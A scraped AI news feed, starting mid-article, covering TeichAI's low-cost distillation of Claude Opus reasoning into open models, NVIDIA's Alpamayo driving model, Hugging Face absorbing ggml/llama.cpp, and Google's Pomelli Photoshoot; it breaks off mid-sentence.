reported the model &quot;does pretty well at first when coding but it always misses many small silly things.&quot; The developer confirmed there is no coding-specific data in the training set: &quot;Not any data in the dataset to advance or reinforce agentic coding capability.&quot; The model likely regressed in areas where the base model was competent because the fine-tuning overwrote those behaviors.</p> <p>TeichAI is planning a v2 that includes coding data and simpler Q&amp;A pairs to address both issues.</p> <h2 id="the-legal-gray-zone">The Legal Gray Zone</h2> <p>Here is where it gets interesting. What TeichAI is doing almost certainly violates the terms of service of every frontier model provider they are distilling.</p> <p>Anthropic's terms are <a href="https://support.claude.com/en/articles/12326764-can-i-use-my-outputs-to-train-an-ai-model">explicit</a>: using Claude outputs to train AI models is prohibited without written permission. The banned uses specifically include &quot;general-purpose chatbots,&quot; &quot;open-ended text generation models,&quot; and &quot;using Claude Outputs as training targets.&quot; TeichAI's work is a textbook example of all three.</p> <p>OpenAI, Google, and xAI have similar clauses. Anthropic has already enforced theirs - they <a href="https://developers.slashdot.org/story/25/08/01/2237220/anthropic-revokes-openais-access-to-claude-over-terms-of-service-violation">revoked OpenAI's API access</a> in August 2025 for terms of service violations, and restricted access for Chinese-controlled companies globally in September.</p> <p>But enforcement against a four-person non-profit releasing free models is a different calculus than enforcement against well-funded competitors. And even if terms of service are breached, the underlying copyright claims are weak. AI outputs generally lack copyrightability because copyright requires human authorship. The student model has a completely different architecture than the teacher. Copyright protects expression, not numerical weight values. Legal analysts at <a href="https://www.fenwick.com/insights/publications/deepseek-model-distillation-and-the-future-of-ai-ip-protection">Fenwick</a> and <a href="https://www.winston.com/en/insights-news/is-ai-distillation-by-deepseek-ip-theft">Winston &amp; Strawn</a> have both concluded that terms of service violations are the strongest available claim - not copyright, not trade secrets.</p> <p>The result is a situation where the practice is clearly against the rules but the rules may not be enforceable in any meaningful way. DeepSeek demonstrated this at scale. TeichAI is demonstrating it can be done by anyone with an API key and $52.</p> <h2 id="the-bigger-picture">The Bigger Picture</h2> <p>TeichAI is not unique. They are just unusually transparent about what the entire open-source model ecosystem has been doing quietly for years.</p> <p>DeepSeek's R1 was widely believed to have been trained partly on reasoning traces from OpenAI's models. Microsoft's Phi series has been called &quot;GPT-4 distillation with extra steps.&quot; The open-source community routinely fine-tunes models on ShareGPT datasets - conversation logs scraped from ChatGPT interactions. What TeichAI did differently is publish the cost ($52.30), the dataset size (250 samples), the exact source (Claude Opus 4.5 with high reasoning), and the results (modest but real improvements).</p> <p>The uncomfortable truth this reveals is that reasoning patterns - the structured thinking, self-correction, and problem decomposition that make frontier models valuable - can be partially transferred with remarkably little data. Two hundred fifty examples is not a lot. The fact that a 30B model can meaningfully improve its GPQA performance from exposure to 250 Claude reasoning traces suggests that what frontier models are doing is not magic. It is a learnable pattern, and the pattern can be taught cheaply.</p> <p>This does not mean the gap between frontier and open-source models is closing. A distilled 30B model scoring 0.29 on GPQA is not competing with Claude scoring above 0.65. But it means the floor is rising. Every time a frontier model gets better at reasoning, its outputs become better training data for the open-source models chasing it. The gap may stay constant in absolute terms while shrinking in practical terms for everyday tasks.</p> <h2 id="what-teichai-built">What TeichAI Built</h2> <p>Beyond the models themselves, TeichAI open-sourced their tooling:</p> <ul> <li><strong><a href="https://github.com/TeichAI/datagen">DataGen</a></strong> - A TypeScript CLI that reads prompts from a text file, sends them to any OpenRouter-compatible API, and outputs structured JSONL training data. Configurable for model, concurrency, system prompt, and reasoning effort. This is the tool they used to generate their datasets.</li> <li><strong><a href="https://github.com/TeichAI">Model-Benchmark-Suite</a></strong> - A Streamlit UI for running lm_eval benchmarks against their models.</li> </ul> <p>The entire pipeline from prompt generation to dataset creation to model training to benchmark evaluation is open source. Anyone can replicate what TeichAI did. That is arguably more significant than the models themselves.</p> <h2 id="what-this-means">What This Means</h2> <p>TeichAI's work is a proof of concept that reasoning distillation is accessible to anyone. Four students, $52, 250 examples, and a weekend is all it takes to produce a model that demonstrably reasons better than its base. The improvements are modest. The models are not frontier-competitive. The legal ground is shaky.</p> <p>But the point is not whether these specific models are good enough to replace Claude. The point is that the barrier to extracting and transferring reasoning capabilities from proprietary models is essentially zero. The frontier labs are producing outputs that, by design, demonstrate their most valuable capability - structured reasoning - and anyone with API access can capture that capability and give it away for free.</p> <p>For the open-source community, this is validation. For frontier labs building moats around reasoning capability, it is a problem that terms of service alone cannot solve.</p> <hr> <p><strong>Sources:</strong></p> <ul> <li><a href="https://huggingface.co/TeichAI">TeichAI on Hugging Face</a></li> <li><a href="https://huggingface.co/TeichAI/GLM-4.7-Flash-Claude-Opus-4.5-High-Reasoning-Distill-GGUF">GLM-4.7-Flash-Claude-Opus-4.5-High-Reasoning-Distill-GGUF</a></li> <li><a href="https://huggingface.co/TeichAI/Qwen3-14B-Claude-4.5-Opus-High-Reasoning-Distill-GGUF">Qwen3-14B-Claude-4.5-Opus-High-Reasoning-Distill-GGUF</a></li> <li><a href="https://huggingface.co/datasets/TeichAI/claude-4.5-opus-high-reasoning-250x">Claude 4.5 Opus High Reasoning Dataset (250 samples)</a></li> <li><a href="https://support.claude.com/en/articles/12326764-can-i-use-my-outputs-to-train-an-ai-model">Can I use my Outputs to train an AI model?</a> (Anthropic)</li> <li><a href="https://www.fenwick.com/insights/publications/deepseek-model-distillation-and-the-future-of-ai-ip-protection">DeepSeek, Model Distillation, and the Future of AI IP Protection</a> (Fenwick)</li> <li><a href="https://www.winston.com/en/insights-news/is-ai-distillation-by-deepseek-ip-theft">Is AI Distillation by DeepSeek IP Theft?</a> (Winston &amp; Strawn)</li> <li><a href="https://github.com/TeichAI/datagen">TeichAI DataGen</a> (GitHub)</li> </ul>Sophie ZhangNewsNVIDIA's Alpamayo Hits 100K Downloads to Become Hugging Face's Top Robotics Modelhttps://awesomeagents.ai/news/nvidia-alpamayo-100k-downloads-top-robotics-model/Sat, 21 Feb 2026 13:00:00 +0100https://awesomeagents.ai/news/nvidia-alpamayo-100k-downloads-top-robotics-model/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>NVIDIA's Alpamayo 1 has surpassed 100,000 downloads on Hugging Face, making it the platform's most downloaded robotics model</li> <li>The 10B-parameter vision-language-action (VLA) model combines an 8.2B Cosmos-Reason backbone with a 2.3B diffusion-based trajectory decoder</li> <li>It uses Chain-of-Causation reasoning to explain why it makes driving decisions, not just what it decides - a first for open autonomous driving models</li> <li>Announced at CES 2026 alongside AlpaSim (simulator) and a 1,727-hour Physical AI dataset spanning 25 countries</li> </ul> </div> <p>Less than two months after Jensen Huang unveiled it on the CES 2026 stage, NVIDIA's <a href="https://huggingface.co/nvidia/Alpamayo-R1-10B">Alpamayo 1</a> has crossed 100,000 downloads on Hugging Face. That makes it the platform's most downloaded robotics model - not by a small margin, but as the first model in the category to hit six figures.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>NVIDIA's Alpamayo 1 has surpassed 100,000 downloads on Hugging Face, making it the platform's most downloaded robotics model</li> <li>The 10B-parameter vision-language-action (VLA) model combines an 8.2B Cosmos-Reason backbone with a 2.3B diffusion-based trajectory decoder</li> <li>It uses Chain-of-Causation reasoning to explain why it makes driving decisions, not just what it decides - a first for open autonomous driving models</li> <li>Announced at CES 2026 alongside AlpaSim (simulator) and a 1,727-hour Physical AI dataset spanning 25 countries</li> </ul> </div> <p>Less than two months after Jensen Huang unveiled it on the CES 2026 stage, NVIDIA's <a href="https://huggingface.co/nvidia/Alpamayo-R1-10B">Alpamayo 1</a> has crossed 100,000 downloads on Hugging Face. That makes it the platform's most downloaded robotics model - not by a small margin, but as the first model in the category to hit six figures.</p> <p>The speed matters because of what Alpamayo represents. This is not another perception model or another trajectory predictor. It is a vision-language-action model that takes multi-camera video as input and produces two things: a driving trajectory and a natural language explanation of why it chose that trajectory. The autonomous driving industry has wanted interpretable end-to-end models for years. Alpamayo is NVIDIA's answer, and the research community is clearly paying attention.</p> <h2 id="what-alpamayo-actually-does">What Alpamayo Actually Does</h2> <p>At its core, Alpamayo 1 is a 10.5-billion-parameter model that bridges reasoning and action. The architecture combines two components:</p> <table> <thead> <tr> <th>Component</th> <th>Parameters</th> <th>Function</th> </tr> </thead> <tbody> <tr> <td>Cosmos-Reason backbone</td> <td>8.2B</td> <td>Vision-language model pre-trained for Physical AI - processes multi-camera video and generates reasoning traces</td> </tr> <tr> <td>Action Expert</td> <td>2.3B</td> <td>Diffusion-based trajectory decoder that produces dynamically feasible trajectories in real time</td> </tr> </tbody> </table> <p>The model takes input from four cameras (front-wide, front-tele, cross-left, cross-right) along with 1.6 seconds of egomotion history at 10Hz. It requires no explicit navigation instructions - no waypoints, no turn-by-turn directions. From raw video and motion history alone, it produces a 6.4-second future trajectory at 10Hz (64 waypoints) alongside a reasoning trace explaining the decision.</p> <p>The reasoning traces are the key differentiator. When Alpamayo encounters a construction zone, it does not just swerve. It outputs something like: &quot;Nudge to the left to increase clearance from construction cones encroaching into the lane.&quot; This is NVIDIA's Chain-of-Causation (CoC) reasoning system - a structured approach where the model generates decision-grounded, causally linked explanations aligned with its driving behavior.</p> <h2 id="chain-of-causation-not-chain-of-thought">Chain-of-Causation: Not Chain-of-Thought</h2> <p>The distinction is important. Chain-of-thought reasoning, as seen in language models like Claude or GPT, generates step-by-step logical reasoning before arriving at an answer. Chain-of-Causation is more specific: it generates causal explanations that are directly tied to physical actions.</p> <p>The training pipeline reflects this:</p> <ol> <li><strong>CoC dataset creation</strong> - A hybrid labeling approach combining VLM-based auto-labeling with human oversight to produce 700,000 causally grounded reasoning traces</li> <li><strong>Supervised fine-tuning</strong> - The Cosmos-Reason backbone is fine-tuned on these traces alongside NVIDIA's proprietary driving data (80,000 hours of multi-camera video, over 1 billion images)</li> <li><strong>Reinforcement learning</strong> - A post-training RL phase optimizes for reasoning-action consistency, ensuring the model's explanations actually match its trajectory predictions</li> </ol> <p>The RL stage is not decorative. According to the <a href="https://arxiv.org/abs/2511.00088">research paper</a>, it delivers a 45% improvement in reasoning quality and a 37% improvement in reasoning-action alignment over supervised fine-tuning alone. Without it, the model could plausibly generate eloquent explanations for trajectories it did not actually plan - a failure mode that would be worse than no explanation at all.</p> <h2 id="performance-numbers">Performance Numbers</h2> <p>The published benchmarks focus on two evaluation modes:</p> <h3 id="open-loop-physicalai-av-dataset">Open-Loop (PhysicalAI-AV Dataset)</h3> <ul> <li><strong>minADE at 6.4 seconds: 0.85 meters</strong> - meaning the model's predicted trajectory is on average less than a meter from the ground truth at the 6.4-second horizon</li> </ul> <h3 id="closed-loop-alpasim-on-physicalai-av-nurec">Closed-Loop (AlpaSim on PhysicalAI-AV-NuRec)</h3> <ul> <li><strong>AlpaSim Score: 0.72</strong></li> <li><strong>35% reduction</strong> in close encounter rate versus trajectory-only baselines</li> <li><strong>12% improvement</strong> on challenging long-tail scenarios</li> <li><strong>99 millisecond latency</strong> - fast enough for real-time urban deployment</li> </ul> <p>The long-tail performance is what matters most here. Autonomous driving has a well-known problem: models trained on highway cruising and normal intersections fail on the rare events that actually cause accidents. Alpamayo was specifically designed and evaluated for these edge cases - complex intersections, pedestrian interactions, vehicle cut-ins, adverse weather.</p> <h2 id="the-full-ecosystem">The Full Ecosystem</h2> <p>Alpamayo was not released as an isolated model. NVIDIA shipped a complete development stack:</p> <h3 id="physical-ai-av-dataset">Physical AI AV Dataset</h3> <p>One of the largest open driving datasets available:</p> <ul> <li><strong>1,727 hours</strong> of driving data across 310,895 clips (20 seconds each)</li> <li><strong>25 countries</strong>, over 2,500 cities</li> <li>Multi-camera and LiDAR for all clips; radar for 163,850 clips</li> <li>Focus on geographic and environmental diversity: traffic patterns, weather conditions, pedestrian behavior</li> </ul> <p>The dataset is available on Hugging Face as <a href="https://huggingface.co/datasets/nvidia/PhysicalAI-Autonomous-Vehicles">PhysicalAI-Autonomous-Vehicles</a>.</p> <h3 id="alpasim">AlpaSim</h3> <p>An open-source closed-loop simulator built on a microservice architecture:</p> <ul> <li><strong>Rendering</strong>: NVIDIA Omniverse NuRec 3DGUT for realistic sensor simulation</li> <li><strong>Traffic</strong>: Configurable behavior models for surrounding vehicles and pedestrians</li> <li><strong>Physics</strong>: Vehicle dynamics simulation</li> <li><strong>Evaluation</strong>: DrivingScore metric for end-to-end policy assessment</li> </ul> <p>The simulator uses gRPC-based modular APIs, meaning researchers can swap in their own models, traffic generators, or rendering backends without touching NVIDIA's code. It ships with approximately 900 reconstructed scenes from real-world driving.</p> <p>NVIDIA demonstrated that AlpaSim simulations achieve up to <strong>83% reduction in variance</strong> of real-world metrics compared to open-loop evaluation alone - meaning simulation-based testing produces more reliable and consistent results than evaluating on static datasets.</p> <h3 id="road-training-algorithm">RoaD Training Algorithm</h3> <p>A concurrently released approach for closed-loop training that addresses covariate shift - the gap between what a model sees during training (recorded data) and what it encounters during deployment (its own predictions). NVIDIA claims it is significantly more data-efficient than traditional reinforcement learning for driving.</p> <h2 id="why-100k-downloads-matters">Why 100K Downloads Matters</h2> <p>The download count is a proxy for something more significant: the autonomous driving research community is converging on VLA models as the next paradigm.</p> <p>Traditional autonomous driving stacks are modular - separate perception, prediction, and planning components stitched together with hand-designed interfaces. End-to-end models like Alpamayo collapse this into a single neural network that goes from pixels to trajectory. The addition of reasoning traces addresses the biggest criticism of end-to-end approaches: that they are black boxes unsuitable for safety-critical deployment.</p> <p>The industry partners NVIDIA named at CES reflect this shift. Lucid Motors, Jaguar Land Rover, and Uber are all exploring Alpamayo. Jensen Huang framed the moment in characteristically understated terms: &quot;The ChatGPT moment for physical AI is here - when machines begin to understand, reason and act in the real world.&quot;</p> <p>NVIDIA positioned Alpamayo 1 explicitly as a <strong>teacher model</strong> - meant to be fine-tuned and distilled into smaller, deployment-ready models by autonomous driving developers. The non-commercial license on the weights (Apache 2.0 for inference code) reflects this: research and development are free, production deployment requires a conversation with NVIDIA.</p> <h2 id="what-it-does-not-solve">What It Does Not Solve</h2> <p>Alpamayo is impressive engineering, but it has clear boundaries.</p> <p><strong>Hardware requirements.</strong> The model needs at least 24GB of VRAM - an RTX 3090 or better. For a model designed to run in vehicles, that is a lot of silicon. The distillation path from 10B parameters to something that fits on automotive-grade hardware is not trivial.</p> <p><strong>Training data limitations.</strong> The model was trained and tested with a specific four-camera, four-frame-history configuration. Performance on different sensor setups is not guaranteed.</p> <p><strong>No navigation input.</strong> Alpamayo does not accept route-level instructions. It predicts what a driver would do given the current scene, not what a driver should do to reach a destination. Integrating it into a full autonomous driving stack requires additional planning components.</p> <p><strong>Non-commercial license.</strong> The weights are free for research, not for deployment. Any company wanting to ship Alpamayo-derived models in production vehicles needs to negotiate with NVIDIA - which is, of course, the point.</p> <h2 id="what-it-means">What It Means</h2> <p>Alpamayo hitting 100K downloads in under two months signals that interpretable VLA models have moved from research curiosity to active development priority. The combination of reasoning traces, strong long-tail performance, and a complete open ecosystem (model, data, simulator, training algorithm) lowers the barrier to entry for autonomous driving research in a way that benefits the entire field.</p> <p>It also extends NVIDIA's reach further down the autonomous driving stack. The company already dominates the hardware layer with its DRIVE platform. With Alpamayo, it is establishing itself as the default starting point for the software layer too. When the teacher model, the training simulator, the evaluation framework, and the dataset all carry the NVIDIA logo, the ecosystem gravitational pull is substantial.</p> <p>For researchers and autonomous driving practitioners, the practical takeaway is simple: the most downloaded robotics model on Hugging Face is now a 10B-parameter VLA that explains its own decisions, ships with 1,700 hours of diverse driving data, and runs on a single GPU. The barrier to working on interpretable end-to-end driving has never been lower.</p> <hr> <p><strong>Sources:</strong></p> <ul> <li><a href="https://huggingface.co/nvidia/Alpamayo-R1-10B">Alpamayo-R1-10B on Hugging Face</a></li> <li><a href="https://developer.nvidia.com/blog/building-autonomous-vehicles-that-reason-with-nvidia-alpamayo/">Building Autonomous Vehicles That Reason with NVIDIA Alpamayo - NVIDIA Technical Blog</a></li> <li><a href="https://nvidianews.nvidia.com/news/alpamayo-autonomous-vehicle-development">NVIDIA Announces Alpamayo Family - NVIDIA Newsroom</a></li> <li><a href="https://arxiv.org/abs/2511.00088">Alpamayo-R1: Bridging Reasoning and Action Prediction for Generalizable Autonomous Driving in the Long Tail - arXiv</a></li> <li><a href="https://techcrunch.com/2026/01/05/nvidia-launches-alpamayo-open-ai-models-that-allow-autonomous-vehicles-to-think-like-a-human/">Nvidia launches Alpamayo, open AI models that allow autonomous vehicles to 'think like a human' - TechCrunch</a></li> <li><a href="https://developer.nvidia.com/drive/alpamayo">Alpamayo for Autonomous Vehicle Development - NVIDIA Developer</a></li> <li><a href="https://github.com/NVlabs/alpasim">AlpaSim on GitHub</a></li> <li><a href="https://github.com/NVlabs/alpamayo">Alpamayo on GitHub</a></li> </ul>Sophie ZhangNewsHugging Face Absorbs llama.cpp Creator in Bid to Own the Local AI Stackhttps://awesomeagents.ai/news/ggml-joins-hugging-face/Sat, 21 Feb 2026 01:00:09 +0100https://awesomeagents.ai/news/ggml-joins-hugging-face/<div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Georgi Gerganov and his ggml.ai team are joining Hugging Face, bringing llama.cpp under the $13.5 billion platform's umbrella</li> <li>llama.cpp remains open-source with Gerganov retaining full technical autonomy</li> <li>The deal gives Hugging Face control over the dominant local inference stack, from model hosting to on-device execution</li> <li>No financial terms were disclosed, but the strategic value is clear: Hugging Face now owns the pipeline end to end</li> </ul> </div> <p>Georgi Gerganov, the Bulgarian engineer whose llama.cpp project single-handedly created the local AI movement, announced on February 20 that his company ggml.ai is joining Hugging Face. The deal brings the most widely used local inference engine under the roof of a company now valued at $13.5 billion after its $2 billion raise in September 2025.</p><div class="news-tldr"> <p><strong>TL;DR</strong></p> <ul> <li>Georgi Gerganov and his ggml.ai team are joining Hugging Face, bringing llama.cpp under the $13.5 billion platform's umbrella</li> <li>llama.cpp remains open-source with Gerganov retaining full technical autonomy</li> <li>The deal gives Hugging Face control over the dominant local inference stack, from model hosting to on-device execution</li> <li>No financial terms were disclosed, but the strategic value is clear: Hugging Face now owns the pipeline end to end</li> </ul> </div> <p>Georgi Gerganov, the Bulgarian engineer whose llama.cpp project single-handedly created the local AI movement, announced on February 20 that his company ggml.ai is joining Hugging Face. The deal brings the most widely used local inference engine under the roof of a company now valued at $13.5 billion after its $2 billion raise in September 2025.</p> <p>The announcement was made simultaneously on <a href="https://huggingface.co/blog/ggml-joins-hf">Hugging Face's blog</a> and a <a href="https://github.com/ggml-org/llama.cpp/discussions/19759">GitHub discussion</a> in the llama.cpp repository. No acquisition price was disclosed. Hugging Face framed it as a mission-driven partnership; the market should read it as a vertical integration play.</p> <h2 id="the-deal-structure">The Deal Structure</h2> <table> <thead> <tr> <th>Detail</th> <th>Value</th> </tr> </thead> <tbody> <tr> <td>Acquirer</td> <td>Hugging Face ($13.5B valuation)</td> </tr> <tr> <td>Target</td> <td>ggml.ai (Georgi Gerganov + team)</td> </tr> <tr> <td>Project</td> <td>llama.cpp (95,000+ GitHub stars)</td> </tr> <tr> <td>Financial terms</td> <td>Undisclosed</td> </tr> <tr> <td>License change</td> <td>None - remains open-source</td> </tr> <tr> <td>Team autonomy</td> <td>Full technical and community leadership retained</td> </tr> <tr> <td>Integration focus</td> <td>Transformers library compatibility, packaging, UX</td> </tr> </tbody> </table> <p>The structure resembles talent-and-project acquisitions common in open-source: the creator joins, the code stays open, and the acquirer gains strategic control over a critical piece of infrastructure. Hugging Face already had two llama.cpp contributors on payroll - <a href="https://huggingface.co/ngxson">ngxson</a> and <a href="https://huggingface.co/allozaur">allozaur</a> - suggesting the relationship had been deepening for some time.</p> <blockquote> <p>&quot;Our shared goal is to provide the community with the building blocks to make open-source superintelligence accessible to the world over the coming years,&quot; the joint announcement stated.</p></blockquote> <h2 id="who-benefits">Who Benefits</h2> <h3 id="hugging-face">Hugging Face</h3> <p>This is a clean strategic win. Hugging Face already hosts the models. Now it controls the dominant tool for running them locally. The company's transformers library has become the de facto standard for model definitions, and llama.cpp is how most people actually execute those models on their own hardware. Connecting the two creates a seamless pipeline: download from the Hub, run with llama.cpp, no friction.</p> <p>The announced integration plans make this explicit. The teams will build &quot;single-click&quot; deployment from the transformers library to llama.cpp, making Hugging Face the one-stop shop for <a href="/guides/how-to-run-open-source-llm-locally/">local LLM inference</a>. Every time someone fires up a quantized model on their MacBook, Hugging Face's fingerprints will be on both ends of the transaction.</p> <p>For a company that just raised $2 billion and needs to show a path to revenue beyond hosted inference, locking in the local AI ecosystem is a smart defensive move. If local inference becomes &quot;a meaningful and competitive alternative to cloud inference&quot; - their words, not mine - Hugging Face is now positioned to capture value either way.</p> <h3 id="the-local-ai-community">The Local AI Community</h3> <p>Sustainability is the real sell here. Gerganov and his small team have been maintaining one of the most critical pieces of AI infrastructure largely on their own. llama.cpp has nearly 95,500 GitHub stars and sits at the foundation of projects like <a href="/tools/best-local-llm-tools-2026/">Ollama and LM Studio</a>, but a project of this importance being maintained by a handful of people is a bus-factor problem.</p> <p>Hugging Face's resources - compute, engineering support, distribution - should help the project keep pace with the relentless stream of new model architectures. The commitment to improved packaging and user experience could also push local AI beyond the developer audience and into mainstream use.</p> <h3 id="open-source-model-makers">Open-Source Model Makers</h3> <p>Better transformers-to-llama.cpp compatibility means model creators can ship to local hardware with less friction. For labs releasing <a href="/leaderboards/open-source-llm-leaderboard/">open-weight models</a> like Meta's Llama family or Alibaba's Qwen series, this reduces the time between release and community adoption on consumer devices.</p> <h2 id="who-pays">Who Pays</h2> <h3 id="independence">Independence</h3> <p>The community's anxiety is not unfounded. One commenter on the GitHub discussion noted &quot;90% worry and concern among users&quot; based on Reddit sentiment. The concerns cluster around a few themes:</p> <ol> <li> <p><strong>Jurisdictional risk.</strong> Hugging Face is a US-incorporated company. Some users raised questions about what that means for a project used globally for private, offline AI inference.</p> </li> <li> <p><strong>Platform lock-in.</strong> The explicit goal of making transformers the &quot;source of truth&quot; for model definitions, with llama.cpp as the execution layer, creates tight coupling. If Hugging Face ever changes its terms, priorities, or business model, the local AI stack is exposed.</p> </li> <li> <p><strong>Precedent.</strong> Every open-source project that gets absorbed by a well-funded platform starts with &quot;nothing changes.&quot; The history of tech acquisitions suggests otherwise, even when the acquirer has good intentions.</p> </li> </ol> <h3 id="competing-tools">Competing Tools</h3> <p>Projects like Ollama, LM Studio, and other frontends built on llama.cpp now depend on infrastructure owned by a potential competitor. Hugging Face has its own inference products. The promise of neutrality is only as good as the next quarterly review.</p> <hr> <p>The deal is not inherently bad - it might even be the best realistic outcome for a project that had outgrown its maintainer base. Gerganov built something that matters: a C/C++ inference engine with <a href="https://github.com/ggml-org/llama.cpp">no dependencies</a> that let millions of people run AI models on their own laptops, no cloud required, no API keys, no terms of service that change overnight. That is worth protecting, and Hugging Face has the resources to do it.</p> <p>But let us be precise about what happened. The company that hosts the models now also controls the most popular way to run them locally. That is vertical integration, not charity. The question is whether Hugging Face can resist the gravitational pull of its own platform incentives long enough for the &quot;nothing changes&quot; promise to actually hold.</p> <p><strong>Sources:</strong></p> <ul> <li><a href="https://huggingface.co/blog/ggml-joins-hf">GGML and llama.cpp join HF to ensure the long-term progress of Local AI - Hugging Face Blog</a></li> <li><a href="https://github.com/ggml-org/llama.cpp/discussions/19759">ggml.ai joins Hugging Face - GitHub Discussion</a></li> <li><a href="https://x.com/ggerganov/status/2024839991482777976">Georgi Gerganov announcement on X</a></li> <li><a href="https://simonwillison.net/2026/Feb/20/ggmlai-joins-hugging-face/">Simon Willison's analysis</a></li> <li><a href="https://fueler.io/blog/hugging-face-usage-revenue-valuation-growth-statistics">Hugging Face in 2026: Usage, Revenue, Valuation &amp; Growth Statistics</a></li> <li><a href="https://blog.adafruit.com/2026/02/20/open-source-ai-ggml-joins-hugging-face-llama-cpp-stays-open-local-ais-long-term-home/">Open-Source AI: ggml joins Hugging Face - Adafruit</a></li> </ul>Daniel OkaforNewsGoogle's Free AI Marketing Suite Now Does Product Photography, and Photographers Are Not Happyhttps://awesomeagents.ai/news/google-pomelli-photoshoot-ai-product-photography/Fri, 20 Feb 2026 23:00:00 +0100https://awesomeagents.ai/news/google-pomelli-photoshoot-ai-product-photography/<p>Google Labs <a href="https://blog.google/innovation-and-ai/models-and-research/google-labs/pomelli-photoshoot/">launched Photoshoot</a>, the latest addition to its Pomelli AI marketing platform. Upload a single photo of your product - any quality, any lighting, any background - and Photoshoot generates studio-grade marketing shots across multiple styles. Studio backgrounds, lifestyle scenes, floating product shots, ingredient layouts, and images with AI-generated human models using your product.</p><p>Google Labs <a href="https://blog.google/innovation-and-ai/models-and-research/google-labs/pomelli-photoshoot/">launched Photoshoot</a>, the latest addition to its Pomelli AI marketing platform. Upload a single photo of your product - any quality, any lighting, any background - and Photoshoot generates studio-grade marketing shots across multiple styles. Studio backgrounds, lifestyle scenes, floating product shots, ingredient layouts, and images with AI-generated human models using your product.</p> <p>It is free. It is available in the US, Canada, Australia, and New Zealand. And it is the clearest signal yet that Google is assembling a full-stack marketing suite designed to funnel small businesses straight into Google Ads.</p> <h2 id="what-photoshoot-does">What Photoshoot Does</h2> <p>The workflow is deliberately simple. Upload a product photo, pick a template category - Studio, Floating, Ingredient, or In Use - and Photoshoot generates variations. Curated themes like &quot;Golden Hour&quot; and &quot;Minimalist Studio&quot; offer quick starting points. Natural language refinement lets you adjust results: &quot;change background to forest,&quot; &quot;make the lighting warmer,&quot; &quot;add a marble surface.&quot;</p> <p>The tool applies Pomelli's &quot;Business DNA&quot; system automatically. When you first set up Pomelli, it analyzes your website to extract your brand's tone, color palette, fonts, and visual style. Every generated image inherits that profile. The result is not just a pretty product photo - it is a product photo that looks like it belongs on your website.</p> <p>One early tester grabbed a candle off their kitchen table and ran it through Photoshoot. Before: a dining room at 10pm. After: something that would not look out of place in a Nordstrom catalog.</p> <h2 id="the-model-behind-it">The Model Behind It</h2> <p>Photoshoot runs on what Google is calling <strong>Nano Banana</strong> - their branding for the Gemini 2.5 Flash Image model, optimized for speed and high-volume generation. A higher-end variant, Nano Banana Pro (Gemini 3 Pro Image), uses GemPix 2, a proprietary rendering engine fused with the Gemini 3.0 Pro reasoning backbone.</p> <p>The architectural difference from earlier diffusion models matters here. Nano Banana is integrated with Gemini's language model framework, which means it plans scenes before rendering - understanding spatial relationships, physics-accurate lighting, and logical consistency. This is why the &quot;In Use&quot; template can generate convincing images of AI models holding your product: the system understands how a hand grips a bottle, how fabric drapes over a shoulder, how light falls on skin next to a reflective surface.</p> <p>Output supports 1K through 4K resolution in standard aspect ratios (1:1, 16:9, 9:16, 21:9). Good enough for social media, e-commerce listings, and most digital advertising.</p> <h2 id="the-free-marketing-suite">The Free Marketing Suite</h2> <p>Photoshoot does not exist in isolation. It is the third major feature in a platform that has evolved with unusual speed:</p> <table> <thead> <tr> <th>Date</th> <th>Feature</th> <th>What It Does</th> </tr> </thead> <tbody> <tr> <td>October 2025</td> <td>Pomelli launch</td> <td>Campaign ideation, branded copy and graphics from a URL</td> </tr> <tr> <td>January 2026</td> <td>Pomelli Animate</td> <td>Static assets to on-brand video via Veo 3.1</td> </tr> <tr> <td>February 2026</td> <td>Photoshoot</td> <td>Single product photo to studio-quality marketing shots</td> </tr> </tbody> </table> <p>In five months, Pomelli went from a campaign idea generator to a full marketing stack: brand identity extraction, product photography, video animation, copy generation, and multi-channel campaign creation. All free. All powered by Google's frontier models.</p> <p>The iteration speed - four major updates in five months - suggests this is not a casual Labs experiment. Google is building something.</p> <h2 id="the-strategic-play">The Strategic Play</h2> <p>The economics are transparent if you look at Google's business model. Pomelli is free the way Google Analytics is free: it feeds the advertising machine.</p> <p>The funnel is straightforward:</p> <ol> <li><strong>Create</strong> marketing assets with Pomelli (free)</li> <li><strong>Animate</strong> them with Veo-powered video (free)</li> <li><strong>Distribute</strong> through Google Ads, Shopping, and Performance Max (paid)</li> </ol> <p>Every small business that builds its marketing workflow inside Pomelli is one step closer to spending on Google Ads. The content creation is the loss leader. The advertising distribution is the revenue.</p> <p>This is pointed at a real gap. Professional product photography runs $500 to $5,000 per product. Small businesses on Etsy, eBay, or independent stores often make do with phone photos and basic editing. Pomelli eliminates the cost barrier entirely, and in doing so, it creates a class of small business owners who have professional marketing assets for the first time - and a natural next question: where should I run ads with these?</p> <h2 id="how-it-compares">How It Compares</h2> <p>The AI product photography space already has players. Photoroom focuses on marketplace compliance (Amazon's white-background rules). Pebblely offers 40 free images per month with template-based consistency. Flair.ai provides a clean drag-and-drop canvas. Shopify Magic integrates with Shopify's commerce platform. Amazon's Titan Image Generator is tied to Amazon Ads.</p> <p>Pomelli's advantage is the Business DNA system - automatic brand consistency across everything it generates - and the fact that it is a full marketing suite, not just an image tool. The disadvantage is that it is a Google Labs experiment that could be shut down at any time, as Google has done with countless Labs projects before.</p> <p>The price advantage is harder to argue with. Pomelli is free. Photoroom charges for premium features. Pebblely caps the free tier at 40 images. Amazon requires a $10,000+ monthly ad spend for beta access to its image generator. When the competition charges money and you charge nothing, the comparison gets short.</p> <h2 id="the-photography-question">The Photography Question</h2> <p>PetaPixel's headline did not mince words: <a href="https://petapixel.com/2026/02/20/googles-pomelli-photoshoot-feature-is-here-to-hammer-nails-into-the-coffin-of-photography/">&quot;Here to Hammer Nails into the Coffin of Photography.&quot;</a></p> <p>A UK survey cited in their coverage found that 58% of photographers have already lost work to generative AI. Photoshoot accelerates the trend. The tool is not replacing fashion editorials or architectural photography - it is replacing the $200 product shoot that a small business books with a local photographer. That segment of commercial photography is being commoditized, and Pomelli makes the economics impossible to compete with.</p> <p>The counterargument from the creative industry is that AI-generated product imagery &quot;converges to the mean&quot; - competent, clean, professional, and utterly safe. For brands that need distinctive visual identity, human photographers still offer something AI cannot. But for the vast majority of e-commerce listings, social media posts, and digital ads, &quot;competent and clean&quot; is exactly what is needed.</p> <h2 id="what-to-watch">What to Watch</h2> <p>The question is not whether Pomelli Photoshoot is good. Early results suggest it is. The question is what Google does with the platform once adoption is established.</p> <p>The most likely paths: tiered pricing 